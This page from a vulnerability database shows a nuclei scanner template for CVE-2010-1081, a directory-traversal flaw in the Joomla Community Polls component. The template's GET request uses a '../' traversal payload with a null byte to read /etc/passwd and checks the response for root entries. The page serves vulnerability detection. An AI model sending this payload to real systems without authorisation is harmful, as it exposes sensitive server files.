Lucene search

K

Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion

🗓️ 27 Sep 2021 11:48:02Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion vulnerability allows unauthorized access to sensitive files and potential compromise of the entire Joomla! installation. Apply relevant security patches and upgrades

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2010-1081
23 Mar 201019:00
cvelist
NVD
CVE-2010-1081
23 Mar 201019:30
nvd
Prion
Directory traversal
23 Mar 201019:30
prion
CVE
CVE-2010-1081
23 Mar 201019:30
cve
Check Point Advisories
Joomla Component com_communitypolls Local File Inclusion (CVE-2010-1081)
10 Nov 201400:00
checkpoint_advisories
Tenable Nessus
Joomla! / Mambo Component Multiple Parameter Local File Include Vulnerabilities
4 Jan 201000:00
nessus
id: CVE-2010-1081

info:
  name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/11511
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1081
    - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1081
    cwe-id: CWE-22
    epss-score: 0.37754
    epss-percentile: 0.97206
    cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: corejoomla
    product: com_communitypolls
  tags: cve,cve2010,joomla,lfi,edb,corejoomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f32746356e8fe22de8b89e7c27c739bf0f5a1bfae2f09f76c2eb515e706082640221009034a2f6e4bf954d8ca147d948a421b298c9f4b6e23604faff49f9483c18883e:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Sep 2021 11:02Current
5.7Medium risk
Vulners AI Score5.7
CVSS25
EPSS0.043
9
.json
Report